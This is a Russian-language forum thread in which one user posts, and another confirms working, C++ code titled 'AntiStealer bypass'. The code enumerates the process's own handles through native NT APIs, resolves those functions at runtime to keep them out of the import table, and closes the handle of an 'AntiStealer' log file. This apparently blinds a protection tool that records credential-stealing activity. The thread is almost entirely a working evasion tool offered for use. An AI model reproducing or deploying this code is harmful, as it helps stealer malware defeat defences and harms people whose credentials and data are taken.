
Просмотр полной версии : AntiStealer bypass


es3n1n)
27.07.2019, 19:15
ловите рофланебало байпасс (работает): код через NtQuerySystemInformation(SystemHandleInformation) перечисляет хендлы текущего процесса и закрывает первый, в имени которого есть «AntiStealer» и «.LOG»/«.log».


C++:






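namespace bypass
{
    // Native API prototypes. They are resolved from ntdll.dll at runtime via
    // filter::get_proc_address rather than linked, so nothing here appears in
    // the module's import table.
    typedef NTSTATUS(NTAPI* NtQuerySystemInformation_t)(ULONG SystemInformationClass,
                                                        PVOID SystemInformation,
                                                        ULONG SystemInformationLength,
                                                        PULONG ReturnLength);

    // Kept for the namespace's interface; activate_meme() does not use it.
    typedef NTSTATUS(NTAPI* NtDuplicateObject_t)(HANDLE SourceProcessHandle,
                                                 HANDLE SourceHandle,
                                                 HANDLE TargetProcessHandle,
                                                 PHANDLE TargetHandle,
                                                 ACCESS_MASK DesiredAccess,
                                                 ULONG Attributes,
                                                 ULONG Options);

    typedef NTSTATUS(NTAPI* NtQueryObject_t)(HANDLE ObjectHandle,
                                             ULONG ObjectInformationClass,
                                             PVOID ObjectInformation,
                                             ULONG ObjectInformationLength,
                                             PULONG ReturnLength);

    // Local copies of the native structures. Being inside `namespace bypass`
    // they do not collide with the global definitions in winternl.h.
    // UNICODE_STRING::Length and MaximumLength are byte counts, and Buffer is
    // not guaranteed to be NUL-terminated.
    typedef struct _UNICODE_STRING
    {
        USHORT Length;
        USHORT MaximumLength;
        PWSTR  Buffer;
    } UNICODE_STRING, *PUNICODE_STRING;

    // One entry of the SystemHandleInformation snapshot.
    // NOTE(review): in the documented layout the first 32 bits are two USHORTs
    // (UniqueProcessId, CreatorBackTraceIndex); comparing the combined field
    // against GetCurrentProcessId() assumes the back-trace index is zero —
    // confirm on targets where handle tracing is enabled.
    typedef struct _SYSTEM_HANDLE
    {
        ULONG       ProcessId;
        BYTE        ObjectTypeNumber;
        BYTE        Flags;
        USHORT      Handle;        // 16-bit handle value
        PVOID       Object;
        ACCESS_MASK GrantedAccess;
    } SYSTEM_HANDLE, *PSYSTEM_HANDLE;

    // Variable-length header: HandleCount entries follow, `Handles[1]` is the
    // usual flexible-array idiom.
    typedef struct _SYSTEM_HANDLE_INFORMATION
    {
        ULONG         HandleCount;
        SYSTEM_HANDLE Handles[1];
    } SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;

    typedef enum _POOL_TYPE
    {
        NonPagedPool,
        PagedPool,
        NonPagedPoolMustSucceed,
        DontUseThisType,
        NonPagedPoolCacheAligned,
        PagedPoolCacheAligned,
        NonPagedPoolCacheAlignedMustS
    } POOL_TYPE, *PPOOL_TYPE;

    // Layout of the ObjectTypeInformation reply. activate_meme() only uses the
    // success/failure of that query, never the fields.
    typedef struct _OBJECT_TYPE_INFORMATION
    {
        UNICODE_STRING  Name;
        ULONG           TotalNumberOfObjects;
        ULONG           TotalNumberOfHandles;
        ULONG           TotalPagedPoolUsage;
        ULONG           TotalNonPagedPoolUsage;
        ULONG           TotalNamePoolUsage;
        ULONG           TotalHandleTableUsage;
        ULONG           HighWaterNumberOfObjects;
        ULONG           HighWaterNumberOfHandles;
        ULONG           HighWaterPagedPoolUsage;
        ULONG           HighWaterNonPagedPoolUsage;
        ULONG           HighWaterNamePoolUsage;
        ULONG           HighWaterHandleTableUsage;
        ULONG           InvalidAttributes;
        GENERIC_MAPPING GenericMapping;
        ULONG           ValidAccess;
        BOOLEAN         SecurityRequired;
        BOOLEAN         MaintainHandleCount;
        USHORT          MaintainTypeList;
        POOL_TYPE       PoolType;
        ULONG           PagedPoolUsage;
        ULONG           NonPagedPoolUsage;
    } OBJECT_TYPE_INFORMATION, *POBJECT_TYPE_INFORMATION;

    // Values the original passed as bare numbers.
    constexpr ULONG       SystemHandleInformationClass = 16;  // SystemHandleInformation
    constexpr ULONG       ObjectNameInformationClass   = 1;   // ObjectNameInformation
    constexpr NTSTATUS    StatusInfoLengthMismatch     = static_cast<NTSTATUS>(0xC0000004); // STATUS_INFO_LENGTH_MISMATCH
    constexpr ACCESS_MASK PipeLikeGrantedAccess        = 0x0012019f;

    // Minimal owner for a malloc()'d buffer. The original leaked every buffer
    // it allocated: the handle snapshot on every path and the two per-handle
    // buffers on the success path. Written without <memory>/<vector> so the
    // block uses only names the file already has in scope.
    struct heap_buffer
    {
        void*  ptr;
        SIZE_T size;

        explicit heap_buffer(SIZE_T bytes) : ptr(malloc(bytes)), size(ptr ? bytes : 0) {}
        ~heap_buffer() { free(ptr); }
        heap_buffer(const heap_buffer&) = delete;
        heap_buffer& operator=(const heap_buffer&) = delete;

        // Resize to `bytes`. realloc() leaves the old block intact when it
        // fails, so on failure the buffer is unchanged and false is returned
        // (the original overwrote the pointer with NULL and leaked the block).
        bool grow(SIZE_T bytes)
        {
            void* next = realloc(ptr, bytes);
            if (next == NULL)
                return false;
            ptr  = next;
            size = bytes;
            return true;
        }
    };

    // Walk the current process's handle table and close the first handle
    // whose object name contains "AntiStealer" and ".LOG" or ".log".
    //
    // How: NtQuerySystemInformation(SystemHandleInformation) yields a snapshot
    // of every handle on the system; entries owned by this process are queried
    // with NtQueryObject(ObjectNameInformation) and the first match is passed
    // to CloseHandle.
    //
    // Returns true only when a match was found AND CloseHandle succeeded (the
    // original returned true even when CloseHandle failed). Returns false when
    // a native routine cannot be resolved, the snapshot cannot be taken, or
    // nothing matches.
    //
    // Caveats a caller should know (Windows semantics, not visible here):
    //  * A handle flagged HANDLE_FLAG_PROTECT_FROM_CLOSE is not closed;
    //    CloseHandle fails (and raises under a debugger) — now reported as false.
    //  * The snapshot is system-wide and races with other threads; the handle
    //    value may be reused between the snapshot and the CloseHandle call.
    //  * Whatever component opened the log still holds the now-closed value;
    //    its later I/O fails with an invalid handle or, if the slot has been
    //    reused, lands on an unrelated object.
    bool activate_meme()
    {
        const auto NtQuerySystemInformation = reinterpret_cast<NtQuerySystemInformation_t>(
            filter::get_proc_address("ntdll.dll", "NtQuerySystemInformation"));
        const auto NtQueryObject = reinterpret_cast<NtQueryObject_t>(
            filter::get_proc_address("ntdll.dll", "NtQueryObject"));
        if (!NtQuerySystemInformation || !NtQueryObject)
            return false; // original called through a NULL pointer on a failed lookup

        // Grow the snapshot buffer until ntdll stops reporting a length mismatch.
        heap_buffer snapshot(0x10000);
        if (snapshot.ptr == NULL)
            return false;

        NTSTATUS status;
        while ((status = NtQuerySystemInformation(SystemHandleInformationClass,
                                                  snapshot.ptr,
                                                  static_cast<ULONG>(snapshot.size),
                                                  NULL)) == StatusInfoLengthMismatch)
        {
            if (!snapshot.grow(snapshot.size * 2))
                return false;
        }
        if (!NT_SUCCESS(status))
            return false;

        const auto  handle_info = static_cast<PSYSTEM_HANDLE_INFORMATION>(snapshot.ptr);
        const ULONG own_pid     = GetCurrentProcessId();

        // Scratch buffers are reused across iterations instead of being
        // malloc'd (and leaked) per handle.
        heap_buffer type_info(0x1000);
        heap_buffer name_info(0x1000);
        if (type_info.ptr == NULL || name_info.ptr == NULL)
            return false;

        for (ULONG i = 0; i < handle_info->HandleCount; ++i)
        {
            const SYSTEM_HANDLE& entry = handle_info->Handles[i];
            if (entry.ProcessId != own_pid)
                continue;

            // Table stores 16-bit handle values; widen before the pointer cast.
            const HANDLE handle = reinterpret_cast<HANDLE>(static_cast<SIZE_T>(entry.Handle));

            // Same pre-filter as the original: skip handles whose type cannot
            // be queried. The returned type data itself is never inspected.
            if (!NT_SUCCESS(NtQueryObject(handle, ObjectTypeInformation,
                                          type_info.ptr, static_cast<ULONG>(type_info.size), NULL)))
                continue;

            // NtQueryObject(ObjectNameInformation) can block indefinitely on a
            // named-pipe handle with pending synchronous I/O; this granted-access
            // mask is the conventional marker for such handles, so skip them.
            if (entry.GrantedAccess == PipeLikeGrantedAccess)
                continue;

            ULONG needed = 0;
            status = NtQueryObject(handle, ObjectNameInformationClass,
                                   name_info.ptr, static_cast<ULONG>(name_info.size), &needed);
            if (status == StatusInfoLengthMismatch && needed > name_info.size)
            {
                // The original retried on *any* failure with a possibly
                // uninitialised length; only a length mismatch is retried here.
                if (!name_info.grow(needed))
                    continue;
                status = NtQueryObject(handle, ObjectNameInformationClass,
                                       name_info.ptr, static_cast<ULONG>(name_info.size), NULL);
            }
            if (!NT_SUCCESS(status))
                continue;

            // OBJECT_NAME_INFORMATION begins with a UNICODE_STRING.
            const UNICODE_STRING& name = *static_cast<const UNICODE_STRING*>(name_info.ptr);
            if (name.Length == 0 || name.Buffer == NULL)
                continue;

            // Bounded copy into a NUL-terminated buffer so wcsstr() can be used.
            // The original memcpy'd Length bytes unchecked into a 1024-wchar
            // array and wrote the terminator at buff + Length + 2 in wchar_t
            // units — out of bounds for any name longer than ~1 KiB.
            wchar_t      text[1024];
            const SIZE_T chars = name.Length / sizeof(wchar_t);
            if (chars >= sizeof(text) / sizeof(text[0]))
                continue;
            memcpy(text, name.Buffer, chars * sizeof(wchar_t));
            text[chars] = L'\0';

            if (wcsstr(text, L"AntiStealer") && (wcsstr(text, L".LOG") || wcsstr(text, L".log")))
                return CloseHandle(handle) != FALSE;
        }
        return false;
    }
}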

Lolendor
28.07.2019, 20:51
рафлан жаба, работает